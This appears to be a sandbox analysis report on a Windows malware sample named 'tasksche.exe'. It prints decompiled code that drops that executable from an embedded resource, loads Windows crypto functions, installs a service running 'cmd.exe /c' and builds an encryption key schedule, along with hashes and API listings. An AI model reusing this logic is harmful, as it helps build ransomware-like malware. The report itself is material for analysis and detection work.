0x00407ed2
0x00407ed3
0x00407edb
0x00407ee0
0x00407ef0
0x00407ef7
0x00407f02
0x00407f02
0x00407ef0
0x00407e4e
0x00407db3
0x00407da1
0x00407d8e
0x00407d7e
0x00407d5b
0x00407d4f
0x00407d43
0x00407f14

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6FFDFB10,?,00000000), ref: 00407CEF
GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
sprintf.MSVCRT ref: 00407E01
sprintf.MSVCRT ref: 00407E18
MoveFileExA.KERNEL32 ref: 00407E2C

Strings

kernel32.dll, xrefs: 00407CEA
CreateProcessA, xrefs: 00407D07
WINDOWS, xrefs: 00407DF2, 00407E0D
tasksche.exe, xrefs: 00407DEA
WriteFile, xrefs: 00407D1C
D, xrefs: 00407ED3
CreateFileA, xrefs: 00407D0F
/i, xrefs: 00407E8D
C:\%s\qeriuwjhrf, xrefs: 00407E12
CloseHandle, xrefs: 00407D29
C:\%s\%s, xrefs: 00407DFB

Memory Dump Source

Source File: 00000001.00000002.252465051.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.252456994.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252477569.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252485261.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252492927.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252529234.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252579362.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252602471.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: AddressProcResource$sprintf$FileFindHandleLoadLockModuleMoveSizeof
String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
API String ID: 4072214828-1507730452
Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: tasksche.exePID: 5512, Parent PID: 4548COMMON

Non-executed Functions

Function 00406C40 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 365
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E00406C40(intOrPtr* __ecx, void* __edx, intOrPtr _a4, void* _a8, signed int _a11) {
				signed int _v5;
				signed char _v10;
				char _v11;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _v24;
				struct _FILETIME _v32;
				struct _FILETIME _v40;
				char _v44;
				unsigned int _v72;
				intOrPtr _v96;
				intOrPtr _v100;
				unsigned int _v108;
				unsigned int _v124;
				char _v384;
				char _v644;
				char _t142;
				char _t150;
				void* _t151;
				signed char _t156;
				long _t173;
				signed char _t185;
				signed char* _t190;
				signed char* _t194;
				intOrPtr* _t204;
				signed int _t207;
				signed int _t208;
				intOrPtr* _t209;
				unsigned int _t210;
				char _t212;
				signed char _t230;
				signed int _t234;
				signed char _t238;
				void* _t263;
				unsigned int _t264;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				intOrPtr _t272;
				char* _t274;
				unsigned int _t276;
				signed int _t277;
				void* _t278;
				intOrPtr* _t280;
				void* _t281;
				intOrPtr _t282;

				_t263 = __edx;
				_t213 = __ecx;
				_t272 = _a4;
				_t208 = _t207 | 0xffffffff;
				_t280 = __ecx;
				_v24 = __ecx;
				if(_t272 < _t208) {
					L61:
					return 0x10000;
				}
				_t131 =  *__ecx;
				if(_t272 >=  *((intOrPtr*)( *__ecx + 4))) {
					goto L61;
				}
				if( *((intOrPtr*)(__ecx + 4)) != _t208) {
					E00406A97(_t131);
					_pop(_t213);
				}
				 *(_t280 + 4) = _t208;
				if(_t272 !=  *((intOrPtr*)(_t280 + 0x134))) {
					if(_t272 != _t208) {
						_t132 =  *_t280;
						if(_t272 >=  *( *_t280 + 0x10)) {
							L12:
							_t133 =  *_t280;
							if( *( *_t280 + 0x10) >= _t272) {
								E004064BB( *_t280,  &_v124,  &_v384, 0x104, 0, 0, 0, 0);
								if(L0040657A(_t213, _t263,  *_t280,  &_v44,  &_v20,  &_v16) == 0) {
									_t142 = E00405D0E( *((intOrPtr*)( *_t280)), _v20, 0);
									if(_t142 != 0) {
										L19:
										return 0x800;
									}
									_push(_v16);
									L00407700();
									_v12 = _t142;
									if(L00405D8A(_t142, 1, _v16,  *((intOrPtr*)( *_t280))) == _v16) {
										_t281 = _a8;
										 *_t281 =  *( *_t280 + 0x10);
										strcpy( &_v644,  &_v384);
										_t209 = __imp___mbsstr;
										_t274 =  &_v644;
										while(1) {
											L21:
											_t150 =  *_t274;
											if(_t150 != 0 && _t274[1] == 0x3a) {
												break;
											}
											if(_t150 == 0x5c || _t150 == 0x2f) {
												_t274 =  &(_t274[1]);
												continue;
											} else {
												_t151 =  *_t209(_t274, "\\..\\");
												if(_t151 != 0) {
													L31:
													_t39 = _t151 + 4; // 0x4
													_t274 = _t39;
													continue;
												}
												_t151 =  *_t209(_t274, "\\../");
												if(_t151 != 0) {
													goto L31;
												}
												_t151 =  *_t209(_t274, "/../");
												if(_t151 != 0) {
													goto L31;
												}
												_t151 =  *_t209(_t274, "/..\\");
												if(_t151 == 0) {
													strcpy(_t281 + 4, _t274);
													_t264 = _v72;
													_a11 = _a11 & 0x00000000;
													_v5 = _v5 & 0x00000000;
													_t156 = _t264 >> 0x0000001e & 0x00000001;
													_t230 =  !(_t264 >> 0x17) & 0x00000001;
													_t276 = _v124 >> 8;
													_t210 = 1;
													if(_t276 == 0 || _t276 == 7 || _t276 == 0xb || _t276 == 0xe) {
														_a11 = _t264 >> 0x00000001 & 0x00000001;
														_t230 = _t264 & 0x00000001;
														_v5 = _t264 >> 0x00000002 & 0x00000001;
														_t156 = _t264 >> 0x00000004 & 0x00000001;
														_t264 = _t264 >> 0x00000005 & 0x00000001;
														_t210 = _t264;
													}
													_t277 = 0;
													 *(_t281 + 0x108) = 0;
													if(_t156 != 0) {
														 *(_t281 + 0x108) = 0x10;
													}
													if(_t210 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000020;
													}
													if(_a11 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000002;
													}
													if(_t230 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000001;
													}
													if(_v5 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000004;
													}
													 *((intOrPtr*)(_t281 + 0x124)) = _v100;
													 *((intOrPtr*)(_t281 + 0x128)) = _v96;
													_v40.dwLowDateTime = E00406B23(_v108 >> 0x10, _v108);
													_v40.dwHighDateTime = _t264;
													LocalFileTimeToFileTime( &_v40,  &_v32);
													_t173 = _v32.dwLowDateTime;
													_t234 = _v32.dwHighDateTime;
													_t212 = _v12;
													 *(_t281 + 0x10c) = _t173;
													 *(_t281 + 0x114) = _t173;
													 *(_t281 + 0x11c) = _t173;
													 *(_t281 + 0x110) = _t234;
													 *(_t281 + 0x118) = _t234;
													 *(_t281 + 0x120) = _t234;
													if(_v16 <= 4) {
														L57:
														if(_t212 != 0) {
															_push(_t212);
															L004076E8();
														}
														_t282 = _v24;
														memcpy(_t282 + 8, _t281, 0x12c);
														 *((intOrPtr*)(_t282 + 0x134)) = _a4;
														goto L60;
													} else {
														while(1) {
															_v12 =  *((intOrPtr*)(_t277 + _t212));
															_v10 = _v10 & 0x00000000;
															_v11 =  *((intOrPtr*)(_t212 + _t277 + 1));
															_a8 =  *(_t212 + _t277 + 2) & 0x000000ff;
															if(strcmp( &_v12, "UT") == 0) {
																break;
															}
															_t277 = _t277 + _a8 + 4;
															if(_t277 + 4 < _v16) {
																continue;
															}
															goto L57;
														}
														_t238 =  *(_t277 + _t212 + 4) & 0x000000ff;
														_t185 = _t238 >> 0x00000001 & 0x00000001;
														_t278 = _t277 + 5;
														_a11 = _t185;
														_v5 = _t238 >> 0x00000002 & 0x00000001;
														if((_t238 & 0x00000001) != 0) {
															_t271 =  *(_t278 + _t212 + 1) & 0x000000ff;
															_t194 = _t278 + _t212;
															_t278 = _t278 + 4;
															 *(_t281 + 0x11c) = E00406B02(_t271,  *_t194 & 0x000000ff | (0 << 0x00000008 | _t271) << 0x00000008);
															_t185 = _a11;
															 *(_t281 + 0x120) = _t271;
														}
														if(_t185 != 0) {
															_t270 =  *(_t278 + _t212 + 1) & 0x000000ff;
															_t190 = _t278 + _t212;
															_t278 = _t278 + 4;
															 *(_t281 + 0x10c) = E00406B02(_t270,  *_t190 & 0x000000ff | (0 << 0x00000008 | _t270) << 0x00000008);
															 *(_t281 + 0x110) = _t270;
														}
														if(_v5 != 0) {
															_t269 =  *(_t278 + _t212 + 1) & 0x000000ff;
															 *(_t281 + 0x114) = E00406B02(_t269,  *(_t278 + _t212) & 0x000000ff | (0 << 0x00000008 | _t269) << 0x00000008);
															 *(_t281 + 0x118) = _t269;
														}
														goto L57;
													}
												}
												goto L31;
											}
										}
										_t274 =  &(_t274[2]);
										goto L21;
									}
									_push(_v12);
									L004076E8();
									goto L19;
								}
								return 0x700;
							}
							E00406520(_t133);
							L11:
							_pop(_t213);
							goto L12;
						}
						E004064E2(_t213, _t132);
						goto L11;
					}
					goto L8;
				} else {
					if(_t272 == _t208) {
						L8:
						_t204 = _a8;
						 *_t204 =  *((intOrPtr*)( *_t280 + 4));
						 *((char*)(_t204 + 4)) = 0;
						 *((intOrPtr*)(_t204 + 0x108)) = 0;
						 *((intOrPtr*)(_t204 + 0x10c)) = 0;
						 *((intOrPtr*)(_t204 + 0x110)) = 0;
						 *((intOrPtr*)(_t204 + 0x114)) = 0;
						 *((intOrPtr*)(_t204 + 0x118)) = 0;
						 *((intOrPtr*)(_t204 + 0x11c)) = 0;
						 *((intOrPtr*)(_t204 + 0x120)) = 0;
						 *((intOrPtr*)(_t204 + 0x124)) = 0;
						 *((intOrPtr*)(_t204 + 0x128)) = 0;
						L60:
						return 0;
					}
					memcpy(_a8, _t280 + 8, 0x12c);
					goto L60;
				}
			}

0x00406c40
0x00406c40
0x00406c4c
0x00406c4f
0x00406c52
0x00406c56
0x00406c59
0x00407064
0x00000000
0x00407064
0x00406c5f
0x00406c64
0x00000000
0x00000000
0x00406c6d
0x00406c70
0x00406c75
0x00406c75
0x00406c7c
0x00406c7f
0x00406ca0
0x00406cec
0x00406cf1
0x00406cfa
0x00406cfa
0x00406cff
0x00406d21
0x00406d3e
0x00406d52
0x00406d5c
0x00406d89
0x00000000
0x00406d89
0x00406d5e
0x00406d61
0x00406d68
0x00406d7e
0x00406d95
0x00406d9b
0x00406dab
0x00406db0
0x00406db8
0x00406dbe
0x00406dbe
0x00406dbe
0x00406dc2
0x00000000
0x00000000
0x00406dd0
0x00406dd6
0x00000000
0x00406dd9
0x00406ddf
0x00406de5
0x00406e11
0x00406e11
0x00406e11
0x00000000
0x00406e11
0x00406ded
0x00406df3
0x00000000
0x00000000
0x00406dfb
0x00406e01
0x00000000
0x00000000
0x00406e09
0x00406e0f
0x00406e1b
0x00406e20
0x00406e28
0x00406e2c
0x00406e3c
0x00406e3e
0x00406e41
0x00406e44
0x00406e46
0x00406e61
0x00406e6b
0x00406e6d
0x00406e78
0x00406e7a
0x00406e7c
0x00406e7c
0x00406e7e
0x00406e82
0x00406e88
0x00406e8a
0x00406e8a
0x00406e96
0x00406e98
0x00406e98
0x00406ea3
0x00406ea5
0x00406ea5
0x00406eae
0x00406eb0
0x00406eb0
0x00406ebb
0x00406ebd
0x00406ebd
0x00406eca
0x00406ed3
0x00406ee6
0x00406ef2
0x00406ef5
0x00406efb
0x00406efe
0x00406f05
0x00406f08
0x00406f0e
0x00406f14
0x00406f1a
0x00406f20
0x00406f26
0x00406f2c
0x00407037
0x00407039
0x0040703b
0x0040703c
0x00407041
0x00407048
0x0040704f
0x0040705a
0x00000000
0x00406f32
0x00406f32
0x00406f3a
0x00406f41
0x00406f45
0x00406f4d
0x00406f5d
0x00000000
0x00000000
0x00406f62
0x00406f6c
0x00000000
0x00000000
0x00000000
0x00406f6e
0x00406f73
0x00406f81
0x00406f86
0x00406f89
0x00406f8f
0x00406f92
0x00406f94
0x00406f99
0x00406f9e
0x00406fba
0x00406fc0
0x00406fc4
0x00406fc4
0x00406fcc
0x00406fce
0x00406fd3
0x00406fd8
0x00406ff4
0x00406ffb
0x00406ffb
0x00407005
0x00407007
0x0040702a
0x00407031
0x00407031
0x00000000
0x00407005
0x00406f2c
0x00000000
0x00406e0f
0x00406dd0
0x00406dcb
0x00000000
0x00406dcb
0x00406d80
0x00406d83
0x00000000
0x00406d88
0x00000000
0x00406d40
0x00406d02
0x00406cf9
0x00406cf9
0x00000000
0x00406cf9
0x00406cf4
0x00000000
0x00406cf4
0x00000000
0x00406c81
0x00406c83
0x00406ca2
0x00406ca7
0x00406caa
0x00406cae
0x00406cb1
0x00406cb7
0x00406cbd
0x00406cc3
0x00406cc9
0x00406ccf
0x00406cd5
0x00406cdb
0x00406ce1
0x00407060
0x00000000
0x00407060
0x00406c91
0x00000000
0x00406c96

APIs

memcpy.MSVCRT(?,?,0000012C,?), ref: 00406C91

Strings

\..\, xrefs: 00406DD9
/..\, xrefs: 00406E03
/../, xrefs: 00406DF5
\../, xrefs: 00406DE7

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: memcpy
String ID: /../$/..\$\../$\..\
API String ID: 3510742995-3885502717
Opcode ID: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
Instruction ID: 8d35de4500b3f4065ad8a7d009fa2f60231b6be20ed9f01f65d9d1a3966dd706
Opcode Fuzzy Hash: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
Instruction Fuzzy Hash: 98D147729082459FDB15CF68C881AEABBF4EF05300F15857FE49AB7381C738A915CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401A45 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401A45() {
				void* _t1;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t11;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;

				_t15 =  *0x40f894; // 0x0
				if(_t15 != 0) {
					L8:
					_t1 = 1;
					return _t1;
				}
				_t11 = LoadLibraryA("advapi32.dll");
				if(_t11 == 0) {
					L9:
					return 0;
				}
				 *0x40f894 = GetProcAddress(_t11, "CryptAcquireContextA");
				 *0x40f898 = GetProcAddress(_t11, "CryptImportKey");
				 *0x40f89c = GetProcAddress(_t11, "CryptDestroyKey");
				 *0x40f8a0 = GetProcAddress(_t11, "CryptEncrypt");
				 *0x40f8a4 = GetProcAddress(_t11, "CryptDecrypt");
				_t9 = GetProcAddress(_t11, "CryptGenKey");
				_t17 =  *0x40f894; // 0x0
				 *0x40f8a8 = _t9;
				if(_t17 == 0) {
					goto L9;
				}
				_t18 =  *0x40f898; // 0x0
				if(_t18 == 0) {
					goto L9;
				}
				_t19 =  *0x40f89c; // 0x0
				if(_t19 == 0) {
					goto L9;
				}
				_t20 =  *0x40f8a0; // 0x0
				if(_t20 == 0) {
					goto L9;
				}
				_t21 =  *0x40f8a4; // 0x0
				if(_t21 == 0 || _t9 == 0) {
					goto L9;
				} else {
					goto L8;
				}
			}

0x00401a48
0x00401a4f
0x00401aec
0x00401aee
0x00000000
0x00401aee
0x00401a60
0x00401a64
0x00401af1
0x00000000
0x00401af1
0x00401a7f
0x00401a8c
0x00401a99
0x00401aa6
0x00401ab3
0x00401ab8
0x00401aba
0x00401ac0
0x00401ac6
0x00000000
0x00000000
0x00401ac8
0x00401ace
0x00000000
0x00000000
0x00401ad0
0x00401ad6
0x00000000
0x00000000
0x00401ad8
0x00401ade
0x00000000
0x00000000
0x00401ae0
0x00401ae6
0x00000000
0x00000000
0x00000000
0x00000000

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8

Strings

CryptAcquireContextA, xrefs: 00401A71
advapi32.dll, xrefs: 00401A55
CryptDecrypt, xrefs: 00401AA0
CryptImportKey, xrefs: 00401A79
CryptGenKey, xrefs: 00401AAD
CryptEncrypt, xrefs: 00401A93
CryptDestroyKey, xrefs: 00401A86

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
API String ID: 2238633743-2459060434
Opcode ID: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
Instruction ID: 9aae3444cc52ced5e7e1ad1d2a06d11cf911cb2b3a933a05a08c6ba10b936042
Opcode Fuzzy Hash: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
Instruction Fuzzy Hash: 20011E32A86311EBDB30AFA5AE856677AE4EA41750368843FB104B2DB1D7F81448DE5C

Uniqueness

Uniqueness Score: -1.00%

Function 00401CE8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 75
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CE8(intOrPtr _a4) {
				void* _v8;
				int _v12;
				void* _v16;
				char _v1040;
				void* _t12;
				void* _t13;
				void* _t31;
				int _t32;

				_v12 = 0;
				_t12 = OpenSCManagerA(0, 0, 0xf003f);
				_v8 = _t12;
				if(_t12 != 0) {
					_t13 = OpenServiceA(_t12, 0x40f8ac, 0xf01ff);
					_v16 = _t13;
					if(_t13 == 0) {
						sprintf( &_v1040, "cmd.exe /c \"%s\"", _a4);
						_t31 = CreateServiceA(_v8, 0x40f8ac, 0x40f8ac, 0xf01ff, 0x10, 2, 1,  &_v1040, 0, 0, 0, 0, 0);
						if(_t31 != 0) {
							StartServiceA(_t31, 0, 0);
							CloseServiceHandle(_t31);
							_v12 = 1;
						}
						_t32 = _v12;
					} else {
						StartServiceA(_t13, 0, 0);
						CloseServiceHandle(_v16);
						_t32 = 1;
					}
					CloseServiceHandle(_v8);
					return _t32;
				}
				return 0;
			}

0x00401cfb
0x00401cfe
0x00401d06
0x00401d09
0x00401d21
0x00401d29
0x00401d2c
0x00401d54
0x00401d7b
0x00401d7f
0x00401d84
0x00401d8b
0x00401d91
0x00401d91
0x00401d98
0x00401d2e
0x00401d31
0x00401d3a
0x00401d42
0x00401d42
0x00401d9e
0x00000000
0x00401da7
0x00000000

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00401CFE
OpenServiceA.ADVAPI32(00000000,0040F8AC,000F01FF), ref: 00401D21
StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401D31
CloseServiceHandle.ADVAPI32(?), ref: 00401D3A
CloseServiceHandle.ADVAPI32(?), ref: 00401D9E

Strings

cmd.exe /c "%s", xrefs: 00401D4E

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: Service$CloseHandleOpen$ManagerStart
String ID: cmd.exe /c "%s"
API String ID: 1485051382-955883872
Opcode ID: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
Instruction ID: 93977d8af42d47d1d9866270745c8e9c50065656b45fe828c5c40e24baaa5e60
Opcode Fuzzy Hash: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
Instruction Fuzzy Hash: 6411AF71900118BBDB205B659E4CE9FBF7CEF85745F10407AF601F21A0CA744949DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00402A76 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 54%

			E00402A76(void* __ecx, signed int _a4, void* _a6, void* _a7, signed int _a8, signed int _a12, signed char* _a16) {
				signed int _v8;
				signed int _v12;
				char _v24;
				int _t193;
				signed int _t198;
				int _t199;
				intOrPtr _t200;
				signed int* _t205;
				signed char* _t206;
				signed int _t208;
				signed int _t210;
				signed int* _t216;
				signed int _t217;
				signed int* _t220;
				signed int* _t229;
				void* _t252;
				void* _t280;
				void* _t281;
				signed int _t283;
				signed int _t289;
				signed int _t290;
				signed char* _t291;
				signed int _t292;
				void* _t303;
				void* _t313;
				intOrPtr* _t314;
				void* _t315;
				intOrPtr* _t316;
				signed char* _t317;
				signed char* _t319;
				signed int _t320;
				signed int _t322;
				void* _t326;
				void* _t327;
				signed int _t329;
				signed int _t337;
				intOrPtr _t338;
				signed int _t340;
				intOrPtr _t341;
				void* _t342;
				signed int _t345;
				signed int* _t346;
				signed int _t347;
				void* _t352;
				void* _t353;
				void* _t354;

				_t352 = __ecx;
				if(_a4 == 0) {
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_push(0x40d570);
					_push( &_v24);
					L0040776E();
				}
				_t283 = _a12;
				_t252 = 0x18;
				_t342 = 0x10;
				if(_t283 != _t342 && _t283 != _t252 && _t283 != 0x20) {
					_t283 =  &_v24;
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_push(0x40d570);
					_push( &_v24);
					L0040776E();
				}
				_t193 = _a16;
				if(_t193 != _t342 && _t193 != _t252 && _t193 != 0x20) {
					_t283 =  &_v24;
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_t193 =  &_v24;
					_push(0x40d570);
					_push(_t193);
					L0040776E();
				}
				 *(_t352 + 0x3cc) = _t193;
				 *(_t352 + 0x3c8) = _t283;
				memcpy(_t352 + 0x3d0, _a8, _t193);
				memcpy(_t352 + 0x3f0, _a8,  *(_t352 + 0x3cc));
				_t198 =  *(_t352 + 0x3c8);
				_t354 = _t353 + 0x18;
				if(_t198 == _t342) {
					_t199 =  *(_t352 + 0x3cc);
					if(_t199 != _t342) {
						_t200 = ((0 | _t199 != _t252) - 0x00000001 & 0xfffffffe) + 0xe;
					} else {
						_t200 = 0xa;
					}
					goto L17;
				} else {
					if(_t198 == _t252) {
						_t200 = ((0 |  *(_t352 + 0x3cc) == 0x00000020) - 0x00000001 & 0x000000fe) + 0xe;
						L17:
						 *((intOrPtr*)(_t352 + 0x410)) = _t200;
						L18:
						asm("cdq");
						_t289 = 4;
						_t326 = 0;
						_a12 =  *(_t352 + 0x3cc) / _t289;
						if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
							L23:
							_t327 = 0;
							if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
								L28:
								asm("cdq");
								_t290 = 4;
								_t291 = _a4;
								_t345 = ( *((intOrPtr*)(_t352 + 0x410)) + 1) * _a12;
								_v12 = _t345;
								_t329 =  *(_t352 + 0x3c8) / _t290;
								_t205 = _t352 + 0x414;
								_v8 = _t329;
								if(_t329 <= 0) {
									L31:
									_a8 = _a8 & 0x00000000;
									if(_t329 <= 0) {
										L35:
										if(_a8 >= _t345) {
											L51:
											_t206 = 1;
											_a16 = _t206;
											if( *((intOrPtr*)(_t352 + 0x410)) <= _t206) {
												L57:
												 *((char*)(_t352 + 4)) = 1;
												return _t206;
											}
											_a8 = _t352 + 0x208;
											do {
												_t292 = _a12;
												if(_t292 <= 0) {
													goto L56;
												}
												_t346 = _a8;
												do {
													_t208 =  *_t346;
													_a4 = _t208;
													 *_t346 =  *0x0040ABFC ^  *0x0040AFFC ^  *0x0040B3FC ^  *(0x40b7fc + (_t208 & 0x000000ff) * 4);
													_t346 =  &(_t346[1]);
													_t292 = _t292 - 1;
												} while (_t292 != 0);
												L56:
												_a16 =  &(_a16[1]);
												_a8 = _a8 + 0x20;
												_t206 = _a16;
											} while (_t206 <  *((intOrPtr*)(_t352 + 0x410)));
											goto L57;
										}
										_a16 = 0x40bbfc;
										do {
											_t210 =  *(_t352 + 0x410 + _t329 * 4);
											_a4 = _t210;
											 *(_t352 + 0x414) =  *(_t352 + 0x414) ^ ((( *0x004089FC ^  *_a16) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t210 & 0x000000ff) + 0x4089fc) & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff;
											_a16 = _a16 + 1;
											if(_t329 == 8) {
												_t216 = _t352 + 0x418;
												_t303 = 3;
												do {
													 *_t216 =  *_t216 ^  *(_t216 - 4);
													_t216 =  &(_t216[1]);
													_t303 = _t303 - 1;
												} while (_t303 != 0);
												_t217 =  *(_t352 + 0x420);
												_a4 = _t217;
												_t220 = _t352 + 0x428;
												 *(_t352 + 0x424) =  *(_t352 + 0x424) ^ (( *0x004089FC << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t217 & 0x000000ff) + 0x4089fc) & 0x000000ff;
												_t313 = 3;
												do {
													 *_t220 =  *_t220 ^  *(_t220 - 4);
													_t220 =  &(_t220[1]);
													_t313 = _t313 - 1;
												} while (_t313 != 0);
												L46:
												_a4 = _a4 & 0x00000000;
												if(_t329 <= 0) {
													goto L50;
												}
												_t314 = _t352 + 0x414;
												while(_a8 < _t345) {
													asm("cdq");
													_t347 = _a8 / _a12;
													asm("cdq");
													_t337 = _a8 % _a12;
													 *((intOrPtr*)(_t352 + 8 + (_t337 + _t347 * 8) * 4)) =  *_t314;
													_a4 = _a4 + 1;
													_t345 = _v12;
													_t338 =  *_t314;
													_t314 = _t314 + 4;
													_a8 = _a8 + 1;
													 *((intOrPtr*)(_t352 + 0x1e8 + (_t337 + ( *((intOrPtr*)(_t352 + 0x410)) - _t347) * 8) * 4)) = _t338;
													_t329 = _v8;
													if(_a4 < _t329) {
														continue;
													}
													goto L50;
												}
												goto L51;
											}
											if(_t329 <= 1) {
												goto L46;
											}
											_t229 = _t352 + 0x418;
											_t315 = _t329 - 1;
											do {
												 *_t229 =  *_t229 ^  *(_t229 - 4);
												_t229 =  &(_t229[1]);
												_t315 = _t315 - 1;
											} while (_t315 != 0);
											goto L46;
											L50:
										} while (_a8 < _t345);
										goto L51;
									}
									_t316 = _t352 + 0x414;
									while(_a8 < _t345) {
										asm("cdq");
										_a4 = _a8 / _a12;
										asm("cdq");
										_t340 = _a8 % _a12;
										 *((intOrPtr*)(_t352 + 8 + (_t340 + _a4 * 8) * 4)) =  *_t316;
										_a8 = _a8 + 1;
										_t341 =  *_t316;
										_t316 = _t316 + 4;
										 *((intOrPtr*)(_t352 + 0x1e8 + (_t340 + ( *((intOrPtr*)(_t352 + 0x410)) - _a4) * 8) * 4)) = _t341;
										_t329 = _v8;
										if(_a8 < _t329) {
											continue;
										}
										goto L35;
									}
